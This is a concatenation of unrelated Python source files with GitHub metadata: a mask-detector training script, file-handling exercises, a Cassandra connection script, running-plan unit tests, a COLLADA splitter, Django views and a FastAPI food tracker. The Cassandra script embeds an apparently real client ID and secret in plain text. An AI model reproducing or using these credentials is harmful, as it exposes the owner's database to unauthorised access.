                         horizontal_flip = True)
#transfer learning using the MobileNetV2 architecture with a new classifier head
base_model = MobileNetV2(include_top = False, input_tensor = Input(shape = (224, 224, 3)))
head_model = base_model.output
head_model = AveragePooling2D(pool_size=(7, 7))(head_model)
head_model = Flatten(name="flatten")(head_model)
head_model = Dense(128, activation="relu")(head_model)
head_model = Dropout(0.5)(head_model)
head_model = Dense(2, activation="softmax")(head_model)
model = Model(inputs=base_model.input, outputs=head_model)
#freeze the pretrained base so only the new head is trained
for layer in base_model.layers:
    layer.trainable = False
print("Compiling model...")
#compiling the model
# NOTE(review): the head is a 2-unit softmax over one-hot labels, for which
# CategoricalCrossentropy is the conventional loss -- confirm that
# BinaryCrossentropy is intended here.
model.compile(optimizer = tf.keras.optimizers.Adam(learning_rate= 0.0001),
              loss=tf.keras.losses.BinaryCrossentropy(),
              metrics=['accuracy'])
print("Model compiled.")
#training the model on augmented batches
print("Training head...")
hist = model.fit(
    aug.flow(X_train, y_train, batch_size=32),
    steps_per_epoch=len(X_train) // 32,
    validation_data=(X_test, y_test),
    validation_steps=len(X_test) // 32,
    epochs=20)
#evaluating the model on the held-out split
print("Evaluating model...")
pred_prob = model.predict(X_test, batch_size=32)
pred_id = np.argmax(pred_prob, axis=1)
print(classification_report(y_test.argmax(axis=1), pred_id, target_names=binarizer.classes_))
#saving the model
print("Saving mask detector model...")
model.save("mask_detector2.model", save_format="h5")
#plotting training/validation loss and accuracy per epoch
epochs = 20  # must match the epochs used in model.fit above
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), hist.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), hist.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), hist.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), hist.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig("plot.png") | OmololaOkebiorun/Face_Mask_Detection | training.py | training.py | py | 4,037 | python | en | code | 0 | github-code | 36 |
def main():
    """Demonstrate the four file-reading helpers on Greeting.txt."""
    path = 'Greeting.txt'
    displaywithForLoop(path)
    print()
    displaywithcomprehensionside(path)
    createdictionary(path)
    createDictionary(path)
def displaywithForLoop(file):
    """Print the contents of *file* verbatim using an explicit for loop."""
    # BUG FIX: the original called `infile.close` without parentheses, so the
    # handle was never actually closed; a with-block closes it deterministically.
    with open(file, 'r') as infile:
        for line in infile:
            print(line, end='')
def displaywithcomprehensionside(file):
    """Print the file's newline-stripped lines as a Python list literal."""
    # Fixes two issues from the original: `infile.close` without parentheses
    # (file never closed) and a local variable shadowing the builtin `list`.
    with open(file, 'r') as infile:
        lines = [line.rstrip() for line in infile]
    print(lines)
def createdictionary(file):
    """Build and print a dict from lines of the form "key,value".

    Only the first two comma-separated fields of each line are used; the
    value has trailing whitespace stripped.  A line without a comma raises
    IndexError (unchanged from the original behaviour).
    """
    # BUG FIX: the original never closed the file; 'with' guarantees it.
    with open(file, 'r') as infile:
        dictionary = {line.split(",")[0]: line.split(',')[1].rstrip() for line in infile}
    print(dictionary)
def createDictionary(file):
    """Show several renderings of the file: its lines as a list, the lines
    joined by spaces and by commas, and a dict parsed from "key,value" lines.
    """
    with open(file, 'r') as source:
        stripped = [row.rstrip() for row in source]
    print(stripped)
    print(' '.join(stripped))
    print(','.join(stripped))
    print(dict([entry.split(',') for entry in stripped]))
main() | rongliaoo/2-23 | practice/processingdata.py | processingdata.py | py | 881 | python | en | code | 0 | github-code | 36 |
15062690781 | from cassandra.cluster import Cluster
from cassandra.auth import PlainTextAuthProvider
# SECURITY(review): the Astra client id/secret and the local bundle path are
# hard-coded below; move them to environment variables or a config file and
# rotate the exposed credentials before sharing this script.
cloud_config = {
    'secure_connect_bundle': 'C:/Users/Damian/Documents/leren-programmeren/python/databasestuff/secure-connect-signup.zip'
}
auth_provider = PlainTextAuthProvider('ckjSgHZotmWyYFbJXRYYcYxU', 'FwJ1SjYdckK26ur43yzeZJQci5uvXzffDF1z31P+E-zBlQFNbNARf.pvEw8YA33A2Q1+XhJOxeq9Y1DqM4n1HK.,_mo2sZ1zTqlQnoeSdnKgm74Z,6BIR70+AKdN.k+J')
cluster = Cluster(cloud=cloud_config, auth_provider=auth_provider)
try:
    session = cluster.connect()
    # Simple connectivity check: ask the server for its release version.
    row = session.execute("select release_version from system.local").one()
    if row:
        print(row[0])
    else:
        print("An error occurred.")
finally:
    # BUG FIX: the original never shut the cluster down, leaving connection
    # pools and background threads open.
    cluster.shutdown()
6007494490 | import json
import unittest
from datetime import date
from first_config import Config
from first_data import FirstData
from first_distance import FirstDistance
from first_pace import FirstPace
from first_plan import FirstPlan
from first_race import FirstRaceType, FirstRace
from first_runner import FirstRunner
from first_step import FirstStepBody, FirstStepRepeat
from first_time import FirstTime
from first_workout import FirstWorkout
class TestFirstPlan(unittest.TestCase):
    def test_to_string(self):
        """Check FirstPlan's str(), tcx(), to_json() and to_html() renderings.

        The expected TCX output is read from cmp_plan1.tcx under
        Config.TEST_RESOURCE_DIR, so this test depends on that resource file.
        """
        ws1 = [0, 2, 5]  # weekday indices -> Mon, Wed, Sat
        ws2 = [1, 3, 6]  # weekday indices -> Tue, Thu, Sun
        try:  # plan built with name and schedule only
            p1 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws1)
            self.assertEqual('Training Plan:\nName - "My first marathon training plan"\nWorkout days: Mon, Wed, Sat\n',
                             str(p1))
            file_name = 'cmp_plan1.tcx'
            with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
                cmp_string = from_file.read()
            self.assertEqual(cmp_string, p1.tcx())
            cmp_json = {"name": "My first marathon training plan",
                        "weekly_schedule": ["mon", "wed", "sat"],
                        "workouts": []}
            self.assertEqual(cmp_json, p1.to_json())
            cmp_html = ('<!DOCTYPE html>\n' +
                        '<html>\n' +
                        '  <head>\n' +
                        '  </head>\n' +
                        '  <body>\n' +
                        '    <h1>Training Plan: My first marathon training plan</h1>\n' +
                        '    <div>\n' +
                        '      <h2>\n' +
                        '        Schedule:\n' +
                        '      </h2>\n' +
                        '    </div>\n' +
                        '  </body>\n' +
                        '</html>')
            self.assertEqual(cmp_html, p1.to_html())
        except TypeError as tex:
            # Constructor/render errors are reported as test failures.
            self.fail(str(tex))
        except ValueError as vex:
            self.fail(str(vex))
        rt1 = FirstRaceType(name='Marathon', distance=FirstDistance.from_string('42.195 km'))
        rd1 = date(year=2017, month=7, day=29)
        r1 = FirstRace(name='SFM', race_type=rt1, race_date=rd1)
        rn1 = FirstRunner(name='DBD')
        try:  # plan built with all optional parts (race and runner)
            p2 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws2, race=r1, runner=rn1)
            cmp_string = ('Training Plan:\nName - "My first marathon training plan"\nWorkout days: Tue, Thu, Sun\n' +
                          'Race:\n  Name - "SFM" of type Marathon - 42.195 km\nRunner:\n  Name - "DBD"\n')
            self.assertEqual(cmp_string, str(p2))
        except TypeError as tex:
            self.fail(str(tex))
        except ValueError as vex:
            self.fail(str(vex))
    def test_add_workout(self):
        """Add one workout to a full plan and verify all renderings.

        Builds a warm-up / 8x(400m fast + 400m rest) / cool-down workout,
        attaches it to the plan, and compares str/tcx/json/html output (in
        both default and km units) against the cmp_plan2.* resource files
        under Config.TEST_RESOURCE_DIR.
        """
        ws1 = [0, 2, 5]  # weekday indices -> Mon, Wed, Sat
        rt1 = FirstRaceType(name='Marathon', distance=FirstDistance.from_string('42.195 km'))
        rd1 = date(year=2017, month=7, day=29)
        r1 = FirstRace(name='SFM', race_type=rt1, race_date=rd1)
        rn1 = FirstRunner(name='DBD')
        p1 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws1, race=r1, runner=rn1)
        # Workout steps: timed warm-up, 8 repeats of fast+rest 400m, cool-down.
        t_warmup = FirstTime.from_string('0:15:00')
        p_warmup = FirstPace.from_string('0:10:00 min per mile')
        s_warmup = FirstStepBody(name='Warm up', pace=p_warmup, time=t_warmup)
        s_repeat = FirstStepRepeat(name='repeat X 8', repeat=8)
        d_interval = FirstDistance.from_string('400 m')
        p_fast = FirstPace.from_string('0:08:00 min per mile')
        s_fast = FirstStepBody(name='Fast', pace=p_fast, distance=d_interval)
        s_repeat.add_step(s_fast)
        s_slow = FirstStepBody(name='Rest', pace=p_warmup, distance=d_interval)
        s_repeat.add_step(s_slow)
        t_cooldown = FirstTime.from_string('0:10:00')
        s_cooldown = FirstStepBody(name='Cool down', pace=p_warmup, time=t_cooldown)
        wo = FirstWorkout(name='Week 1 Key-run 1', workout_date=date(year=2017, month=6, day=24))
        wo.add_step(step=s_warmup)
        wo.add_step(step=s_repeat)
        wo.add_step(step=s_cooldown)
        try:  # first workout
            p1.add_workout(workout=wo)
            cmp_string = ('Training Plan:\nName - "My first marathon training plan"\n' +
                          'Workout days: Mon, Wed, Sat\nRace:\n' +
                          '  Name - "SFM" of type Marathon - 42.195 km\nRunner:\n  Name - "DBD"\nWorkouts:\n' +
                          '  "Week 1 Key-run 1"\n  Sat 2017-06-24\n  scheduled\n' +
                          'Total 1 workouts\n')
            self.assertEqual(cmp_string, str(p1))
            file_name = 'cmp_plan2.tcx'
            with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
                cmp_string = from_file.read()
            self.assertEqual(cmp_string, p1.tcx())
            file_name = 'cmp_plan2.json'
            with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
                cmp_json = json.load(from_file)
            self.assertEqual(cmp_json, p1.to_json())
            file_name = 'cmp_plan2_km.json'
            with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
                cmp_json = json.load(from_file)
            self.assertEqual(cmp_json, p1.to_json(output_unit='km'))
            file_name = 'cmp_plan2.html'
            with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
                cmp_html = from_file.read()
            self.assertEqual(cmp_html, p1.to_html())
            file_name = 'cmp_plan2_km.html'
            with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
                cmp_html = from_file.read()
            self.assertEqual(cmp_html, p1.to_html(output_unit='km'))
        except TypeError as ex:
            self.fail(str(ex))
def test_generate_workouts(self):
data = FirstData(json_path=Config.DATABASE_JSON)
ws1 = [0, 2, 5]
target_time = data.equivalent_time(time_from=FirstTime(minutes=30),
race_index_from=data.race_type_index_by_name('5K'),
race_index_to=data.race_type_index_by_name('Marathon'))
sf_marathon = FirstRace(race_type=data.get_race_type_by_name('Marathon'),
name='San Francisco Marathon',
race_date=date(year=2017, month=7, day=23),
target_time=target_time)
me = FirstRunner(name='Daniel BenDavid', age=56, gender='m', email='yossi@gmail.com')
p1 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws1, race=sf_marathon, runner=me)
try: # positive
p1.generate_workouts(data=data)
self.assertEqual(48, len(p1.workouts))
wo = p1.workouts[0]
self.assertEqual('Week 1 Keyrun 1', wo.name)
self.assertEqual(3, len(wo.steps))
step = wo.steps[0]
self.assertEqual('warmup', step.name)
self.assertEqual(0, step.step_id)
self.assertEqual('time', step.get_duration_type())
self.assertEqual('0:15:00', str(step.time))
self.assertEqual('0:11:31 min per mile', str(step.pace))
step = wo.steps[1]
self.assertEqual('repeat X 3', step.name)
self.assertEqual(1, step.step_id)
self.assertEqual(3, step.repeat) # repeat
self.assertEqual(2, len(step.steps))
substep = step.steps[0]
self.assertEqual('1600m', substep.name)
self.assertEqual(2, substep.step_id)
self.assertEqual('distance', substep.get_duration_type())
self.assertEqual('1600.0 m', str(substep.distance))
self.assertEqual('0:09:26 min per mile', str(substep.pace))
substep = step.steps[1]
self.assertEqual('200 m@RI', substep.name)
self.assertEqual(3, substep.step_id)
self.assertEqual('distance', substep.get_duration_type())
self.assertEqual('200.0 m', str(substep.distance))
self.assertEqual('0:11:31 min per mile', str(substep.pace))
step = wo.steps[2]
self.assertEqual('cooldown', step.name)
self.assertEqual(4, step.step_id)
self.assertEqual('time', step.get_duration_type())
self.assertEqual('0:10:00', str(step.time))
self.assertEqual('0:11:31 min per mile', str(step.pace))
file_name = 'cmp_plan_marathon.tcx'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_string = from_file.read()
self.assertEqual(cmp_string, p1.tcx())
file_name = 'cmp_plan_marathon.json'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_json = json.load(from_file)
self.assertEqual(cmp_json, p1.to_json())
file_name = 'cmp_plan_marathon.html'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_html = from_file.read()
self.assertEqual(cmp_html, p1.to_html())
except ValueError as vex:
self.fail(str(vex))
except TypeError as tex:
self.fail(str(tex))
ws1 = [0, 3, 6]
target_time = data.equivalent_time(time_from=FirstTime(minutes=22, seconds=36),
race_index_from=data.race_type_index_by_name('5K'),
race_index_to=data.race_type_index_by_name('HalfMarathon'))
sf_half_marathon = FirstRace(race_type=data.get_race_type_by_name('HalfMarathon'),
name='San Francisco Marathon',
race_date=date(year=2017, month=7, day=23),
target_time=target_time)
me = FirstRunner(name='Daniel BenDavid', age=56, gender='m', email='yossi@gmail.com')
p2 = FirstPlan(name='San Francisco half-marathon training plan', weekly_schedule=ws1,
race=sf_half_marathon, runner=me)
try: # positive
p2.generate_workouts(data=data)
file_name = 'cmp_plan_half_marathon.tcx'
from_file = open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name))
cmp_string = from_file.read()
from_file.close()
self.assertEqual(cmp_string, p2.tcx())
except ValueError as vex:
self.fail(str(vex))
except TypeError as tex:
self.fail(str(tex))
# Allow running this test module directly (python test_plan.py) as well as
# through a test runner.
if __name__ == '__main__':
    unittest.main()
| bendaten/first_trainer | test/test_plan.py | test_plan.py | py | 10,937 | python | en | code | 1 | github-code | 36 |
15947746512 | '''
用于将dea模型中的构件拆分到单独的dae文件中
'''
def process(dae_path, base_output_dae_path):
    """Split every component (<node>) of a COLLADA .dae file into its own .dae file.

    dae_path: path of the source COLLADA file.
    base_output_dae_path: directory under which a per-file output folder
        (named after the source file, without extension) is created.

    For each visual-scene node a new document is assembled from the shared
    <asset>, the node itself, its geometry, and the materials/effects the
    node references.
    """
    import xml.dom.minidom
    import os
    if not os.path.exists(dae_path):
        print('路径%s不存在' % dae_path)
        # Bug fix: the original fell through here and crashed inside
        # minidom.parse(); abort when the input file does not exist.
        return
    # Output folder: <base>/<source file name without extension>
    output_dir = base_output_dae_path + '\\' + dae_path[dae_path.rfind('\\') + 1: dae_path.find('.')]
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    doc = xml.dom.minidom.parse(dae_path)
    impl = xml.dom.minidom.getDOMImplementation()
    # Collect the elements that are shared or split across the output files.
    asset_tag = doc.getElementsByTagName('asset')[0]
    effect_tags = doc.getElementsByTagName('effect')
    material_tags = doc.getElementsByTagName('material')
    geometry_tags = doc.getElementsByTagName('geometry')
    node_tags = doc.getElementsByTagName('node')
    scene_tag = doc.getElementsByTagName('scene')[0]
    print('effect_tags: ', len(effect_tags))
    print('material_tags: ', len(material_tags))
    print('geometry_tags: ', len(geometry_tags))
    print('node_tags: ', len(node_tags))
    # Emit one .dae document per <node>.  NOTE: appendChild *moves* a DOM
    # node, so the shared asset_tag/scene_tag migrate from one generated
    # document to the next on each iteration.
    count = 0
    for node in node_tags:
        # Create a fresh dae document.
        new_doc = impl.createDocument(None, 'COLLADA', None)
        # Root <COLLADA> element of the new document.
        new_doc_root = new_doc.documentElement
        new_doc_root.setAttribute('xmlns', 'http://www.collada.org/2005/11/COLLADASchema')
        new_doc_root.setAttribute('version', '1.4.1')
        # Attach the shared <asset> element.
        new_doc_root.appendChild(asset_tag)
        # Wrap the current node in library_visual_scenes/visual_scene.
        library_visual_scenes = new_doc.createElement('library_visual_scenes')
        visual_scene = new_doc.createElement('visual_scene')
        visual_scene.setAttribute('id', 'IfcOpenShell')
        visual_scene.appendChild(node)
        library_visual_scenes.appendChild(visual_scene)
        new_doc_root.appendChild(library_visual_scenes)
        # Copy over the geometry this node references (by url="#id").
        instance_geometry = node.getElementsByTagName('instance_geometry')[0]
        geometry_id = instance_geometry.getAttribute('url')[1:]
        geometrys = getElementsById(geometry_tags, geometry_id)
        library_geometries = new_doc.createElement('library_geometries')
        for geometry in geometrys:
            library_geometries.appendChild(geometry)
        new_doc_root.appendChild(library_geometries)
        # Copy over the materials, and each material's effect.
        library_materials = new_doc.createElement('library_materials')
        library_effects = new_doc.createElement('library_effects')
        instance_materials = node.getElementsByTagName('instance_material')
        for instance_material in instance_materials:
            material_id = instance_material.getAttribute('target')[1:]
            materials = getElementsById(material_tags, material_id)
            for material in materials:
                library_materials.appendChild(material)
                instance_effect = material.getElementsByTagName('instance_effect')[0]
                effect_id = instance_effect.getAttribute('url')[1:]
                effects = getElementsById(effect_tags, effect_id)
                for effect in effects:
                    library_effects.appendChild(effect)
        # Attach the material and effect libraries to the new document.
        new_doc_root.appendChild(library_materials)
        new_doc_root.appendChild(library_effects)
        # Attach the shared <scene> element.
        new_doc_root.appendChild(scene_tag)
        # encoding='utf-8' is required here to avoid mojibake in the output.
        output_file = output_dir + '\\' + dae_path[dae_path.rfind('\\') + 1: dae_path.find('.')] + '-' + geometry_id + '-' + str(count) + '.dae'
        with open(output_file, mode='w', encoding='utf-8') as f:
            print('start writing...')
            print(count)
            new_doc.writexml(f, addindent='', newl='', encoding='utf-8')
            print('done writing...')
            print('#'*100)
        count += 1
        print('current count', count)
        print('-'*20)
def getElementsById(doms, id):
    """Return every DOM element in *doms* whose ``id`` attribute equals *id*."""
    return [dom for dom in doms if dom.getAttribute('id') == id]
return result
if __name__ == '__main__':
    # Hard-coded development paths; uncomment the input() lines below to
    # prompt for them interactively instead.
    dae_path = 'C:\\Users\\dell\\Desktop\\Lab.dae'
    base_output_dae_path = 'C:\\Users\\dell\\Desktop'
    # 1iUTeNLx945xp4Fd_hV3Bb appears twice (duplicate id in the sample file)
    # dae_path = input('请输入dae文件路径: ')
    # base_output_dae_path = input('请输入生成文件所在的路径: ')
    process(dae_path, base_output_dae_path)
26446464278 | from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.http import JsonResponse
from .forms import SignUpForm, ProfileForm, LoginForm
from django.shortcuts import render, redirect
from .models import Profile, Search
from product.models import Product
import json
def signup_view(request):
    """Register a new user, log them in, create their profile, go home."""
    if request.method != 'POST':
        return render(request, 'user/signup.html', {'form': SignUpForm()})
    form = SignUpForm(request.POST)
    if form.is_valid():
        form.save()
        # Authenticate with the freshly created credentials and log in.
        user = authenticate(
            username=form.cleaned_data.get('username'),
            password=form.cleaned_data.get('password1'),
        )
        login(request, user)
        # Every new user gets an (initially empty) profile.
        profile = Profile()
        profile.user = request.user
        profile.save()
        return redirect('home')
    # Invalid POST: re-render with the bound form so errors are displayed.
    return render(request, 'user/signup.html', {'form': form})
def login_view(request):
    """Authenticate a user via LoginForm and start a session."""
    if request.method != 'POST':
        return render(request, 'user/login.html', {'form': LoginForm()})
    form = LoginForm(request, data=request.POST)
    if form.is_valid():
        user = authenticate(
            username=form.cleaned_data.get('username'),
            password=form.cleaned_data.get('password'),
        )
        login(request, user)
        return redirect('home')
    # Invalid credentials: re-render with the bound form and its errors.
    return render(request, 'user/login.html', {'form': form})
@login_required
def profile(request):
    """Show and update the logged-in user's profile (account fields + picture)."""
    try:
        profile = Profile.objects.get(user=request.user)
    except Profile.DoesNotExist:
        # Bug fix: Model.save() returns None, so the original
        # `profile = Profile(user=request.user).save()` left `profile` as
        # None and crashed below on `profile.image.url`.
        profile = Profile(user=request.user)
        profile.save()
    if request.method == 'POST':
        form = ProfileForm(request.POST, request.FILES, instance=profile)
        if form.is_valid():
            form_profile = form.save(commit=False)
            # Copy the editable account fields onto the User record.
            request.user.username = request.POST['username']
            request.user.first_name = request.POST['first_name']
            request.user.last_name = request.POST['last_name']
            request.user.email = request.POST['email']
            request.user.save()
            form_profile.user = request.user
            # Only replace the picture when a new one was uploaded.
            if 'image' in request.FILES:
                image = request.FILES['image']
                if image:
                    form_profile.image = image
            form_profile.save()
            return redirect('profile')
    # GET (or invalid POST): pre-fill the form with the current values so
    # the user sees all fields already filled out.
    form = ProfileForm()
    form.fields['image'].label = 'Mynd'
    form.fields['username'].initial = request.user.username
    form.fields['first_name'].initial = request.user.first_name
    form.fields['last_name'].initial = request.user.last_name
    form.fields['email'].initial = request.user.email
    return render(request, 'user/profile.html', {
        'form': form,
        'image': profile.image.url
    })
def __get_product_list(user_id):
    """Return the Product objects the given user has viewed, newest first."""
    viewed_ids = Search.objects.filter(
        profile__user_id=user_id
    ).order_by('-date_of_search').values_list('product_id', flat=True)
    # Resolve each id to its Product, preserving the search order.
    return [Product.objects.get(id=product_id) for product_id in viewed_ids]
@login_required
def viewed_products(request):
    """Render the ten most recently viewed products for the current user."""
    recent = __get_product_list(request.user.id)[:10]
    return render(request, 'user/viewed_products.html', {'products': recent})
# Utilized for viewed products, each view for a user gets appended to the list.
# In-process cache of (profile_id, product_id) pairs already recorded, used by
# add_to_search() to short-circuit duplicate inserts.  NOTE(review): this is
# module-level state — shared across requests and lost on process restart.
search_list = []
def add_to_search(request):
    """Record that the logged-in user viewed a product.

    Expects a POST whose JSON body is the product id.  Uses the module-level
    `search_list` as an in-process duplicate guard in front of the Search
    table; returns a JSON response describing the outcome.
    """
    if request.method == 'POST':
        if request.user.is_authenticated:
            try:
                user_profile = Profile.objects.get(user__id=request.user.id)
            # The user has no profile so we create one
            except Profile.DoesNotExist:
                user_profile = Profile()
                user_profile.user = request.user
                user_profile.save()
            # We make a new search instance and use the profile of the user
            search = Search()
            search.profile = user_profile
            # Get the id for the viewed product
            try:
                product_id = json.loads(request.body)
            except json.JSONDecodeError:
                return send_json('JSON was invalid', 400)
            # If the user has viewed the product, then we don't add it again to the search_list
            if (user_profile.id, product_id) in search_list:
                return send_json('The search already exists', 409)
            elif Search.objects.filter(profile__id=user_profile.id, product__id=product_id).exists():
                # NOTE(review): this branch removes a pair that was never
                # shown to be in search_list — list.remove() raises
                # ValueError when the pair is absent (e.g. after a process
                # restart while the row exists in the DB). Verify intent.
                search_list.remove((user_profile.id, product_id))
                return send_json('The search already exists', 409)
            else:
                search_list.append((user_profile.id, product_id))
            try:
                product = Product.objects.get(id=product_id)
            except Product.DoesNotExist:
                return send_json('The viewed product was not found', 404)
            search.product = product
            search.save()
            return send_json('', 201, product_id)
        else:
            # Anonymous users: echo the query parameters back (no recording).
            return JsonResponse({'data': request.GET})
    else:
        return send_json('Request method not supported', 400)
def send_json(message, status_code, data=None):
    """Build a JsonResponse carrying `data` and `message` with `status_code`.

    Fix: the original used a mutable default argument (`data={}`); use the
    None-sentinel idiom so calls can never share a default dict.
    """
    response = JsonResponse({
        'data': {} if data is None else data,
        'message': message
    })
    response.status_code = status_code
    return response
| RunarVestmann/verklegtnamskeid2 | captain_console/user/views.py | views.py | py | 6,004 | python | en | code | 0 | github-code | 36 |
7752973710 | from fastapi import FastAPI, Request, Form, HTTPException
from fastapi.templating import Jinja2Templates
from fastapi.responses import HTMLResponse, RedirectResponse, JSONResponse
from pydantic import BaseModel
import psycopg2
import datetime
from uuid import uuid4
from fastapi.responses import StreamingResponse
from io import BytesIO
from typing import Optional
import tempfile
import os
from PIL import Image
import os
from .routers import background_tasks, create_qr_codes
from dotenv import load_dotenv
from os import getenv
load_dotenv()  # take environment variables from .env.
# Application object plus the feature routers (background tasks, QR codes).
app = FastAPI()
app.include_router(background_tasks.router)
app.include_router(create_qr_codes.router)
# Jinja2 templates live next to this module in ./templates.
templates_path = os.path.join(os.path.dirname(__file__), "templates")
templates = Jinja2Templates(directory=templates_path)
# Connect to the database
# Connect to the database
def connect_to_db():
    """Open a psycopg2 connection using the DATABASE_URL environment variable.

    SSL is required for any non-local database (i.e. whenever the URL does
    not mention 'localhost').
    """
    database_url = os.getenv("DATABASE_URL")
    if not database_url:
        # Fail with a clear message instead of the original opaque TypeError
        # from `'localhost' not in None`.
        raise RuntimeError("DATABASE_URL environment variable is not set")
    use_ssl = 'localhost' not in database_url
    return psycopg2.connect(database_url, sslmode='require' if use_ssl else None)
# Initialize the database
# Initialize the database
def init_db():
    """Create the food_items table if it does not already exist."""
    connection = connect_to_db()
    db_cursor = connection.cursor()
    db_cursor.execute("""
    CREATE TABLE IF NOT EXISTS food_items (
        pk UUID PRIMARY KEY,
        id UUID NOT NULL,
        food VARCHAR(255) NOT NULL,
        date_added DATE NOT NULL,
        expiration_date DATE NOT NULL,
        notes VARCHAR(255),
        update_time TIMESTAMP NOT NULL,
        date_consumed DATE,
        location VARCHAR(255)
    )
    """)
    connection.commit()
    db_cursor.close()
    connection.close()
# Ensure the schema exists before the app starts serving requests.
init_db()
# Twilio credentials; os.environ[...] raises KeyError at import time when a
# variable is missing, so misconfiguration fails fast.  NOTE(review): these
# constants are not referenced in this chunk — presumably used elsewhere.
TWILIO_ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
TWILIO_AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
TWILIO_PHONE_NUMBER = os.environ['TWILIO_PHONE_NUMBER']
# Define the request model
class FoodItem(BaseModel):
    """Pydantic model mirroring one revision row of the food_items table."""
    pk: Optional[str] = None    # primary key of this revision row
    id: Optional[str] = None    # stable item id shared by all revisions
    food: str                   # item name
    date_added: datetime.date   # when the item was first recorded
    expiration_date: datetime.date
    notes: Optional[str] = None
    days_old: Optional[int] = None    # derived: age in days (not stored)
    days_left: Optional[int] = None   # derived: days until expiry (not stored)
    update_time: Optional[datetime.datetime] = None   # revision timestamp
    date_consumed: Optional[datetime.date] = None     # set once item consumed
    location: Optional[str] = None    # storage location
async def get_food_items(query_string):
    """Fetch the latest revision of every not-yet-consumed food item.

    query_string: SQL tail appended verbatim to the base query (e.g. an
    ORDER BY clause) and terminated by ';'.  NOTE(review): the tail is
    concatenated, not parameterized — callers must only pass trusted,
    hard-coded fragments.
    """
    conn = connect_to_db()
    cur = conn.cursor()
    # Latest revision per id = the row whose update_time equals the max for
    # that id; consumed items (date_consumed set) are filtered out.
    query = """
    SELECT fi.pk, fi.id, fi.food, fi.date_added, fi.expiration_date, fi.notes, fi.update_time, fi.date_consumed, fi.location
    FROM food_items fi
    INNER JOIN (
        SELECT id, MAX(update_time) AS max_update_time
        FROM food_items
        GROUP BY id
    ) AS mfi ON fi.id = mfi.id AND fi.update_time = mfi.max_update_time
    WHERE fi.date_consumed IS NULL
    """
    query = query + query_string
    cur.execute(query)
    rows = cur.fetchall()
    cur.close()
    conn.close()
    # days_left is derived here so templates can show time until expiry.
    food_items = [FoodItem(pk=row[0], days_left=(row[4] - datetime.date.today()).days, id=row[1], food=row[2], date_added=row[3], expiration_date=row[4], notes=row[5], update_time=row[6], date_consumed=row[7], location=row[8]) for row in rows]
    return food_items
@app.get("/", response_class=HTMLResponse)
async def read_items(request: Request, sort_by_expiration_date: bool = False, sort_order: Optional[str] = None):
    """Render the index page, optionally sorted by expiration date."""
    suffix = ""
    if sort_by_expiration_date:
        # Any value other than "asc" sorts descending.
        direction = "ASC" if sort_order == "asc" else "DESC"
        suffix = f" ORDER BY fi.expiration_date {direction}"
    suffix += ";"
    food_items = await get_food_items(suffix)
    return templates.TemplateResponse("index.html", {"request": request, "food_items": food_items})
@app.get("/favicon.ico")
def read_favicon():
    """Serve no favicon: reply 204 No Content.

    Fix: raising HTTPException(204) (as before) attaches a JSON detail body,
    which is invalid for a 204 response; return an empty response instead.
    """
    return HTMLResponse(status_code=204)
@app.get("/{item_id}/update/", response_class=HTMLResponse)
async def edit_food_item(
        request: Request,
        item_id: str):
    """Render the edit form for one item, with the known storage locations."""
    matched = {}
    known_locations = []
    items = await get_food_items(";")
    for entry in items:
        # Collect each distinct location once, preserving first-seen order.
        if entry.location not in known_locations:
            known_locations.append(entry.location)
        if entry.id == item_id:
            matched = {
                "id": entry.id,
                "food": entry.food,
                "date_added": entry.date_added,
                "expiration_date": entry.expiration_date,
                "notes": entry.notes,
                "date_consumed": entry.date_consumed,
                "location": entry.location
            }
    return templates.TemplateResponse("edit.html", {"locations": known_locations, "request": request, "item": matched})
@app.post("/{item_id}/update/")
async def update_food_item(
        item_id: str,
        food: str = Form(...),
        expiration_date: datetime.date = Form(...),
        notes: Optional[str] = Form(None),
        date_consumed: Optional[datetime.date] = Form(None),
        location: Optional[str] = Form(None)):
    """Persist an edit as a new revision row for the given item id."""
    conn = connect_to_db()
    cursor = conn.cursor()
    # create new entry for edit so needs a new PK
    item_pk = str(uuid4())
    # capture time of edit
    dt = datetime.datetime.now()
    # get date_added from original entry and add to updated entry
    cursor.execute("SELECT date_added FROM food_items WHERE id=%s", (item_id,))
    date_added_row = cursor.fetchone()
    # Fall back to today when the item has no prior revision (fresh QR code).
    date_added = date_added_row[0] if date_added_row is not None else datetime.date.today()
    cursor.execute(
        "INSERT INTO food_items (pk, id, food, date_added, expiration_date, notes, update_time, date_consumed, location) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)",
        (item_pk, item_id, food, date_added, expiration_date, notes, dt, date_consumed, location),
    )
    conn.commit()
    cursor.close()
    conn.close()
    return {"success": True, "message": "Successfully updated the food item."}
@app.get("/{item_id}/view/", response_class=HTMLResponse)
async def view_food_item(request: Request, item_id: str):
    """Render the detail page for the most recent revision of an item."""
    conn = connect_to_db()
    cursor = conn.cursor()
    cursor.execute("SELECT * FROM food_items WHERE id = %s ORDER BY update_time DESC LIMIT 1", (item_id,))
    item = cursor.fetchone()
    cursor.close()
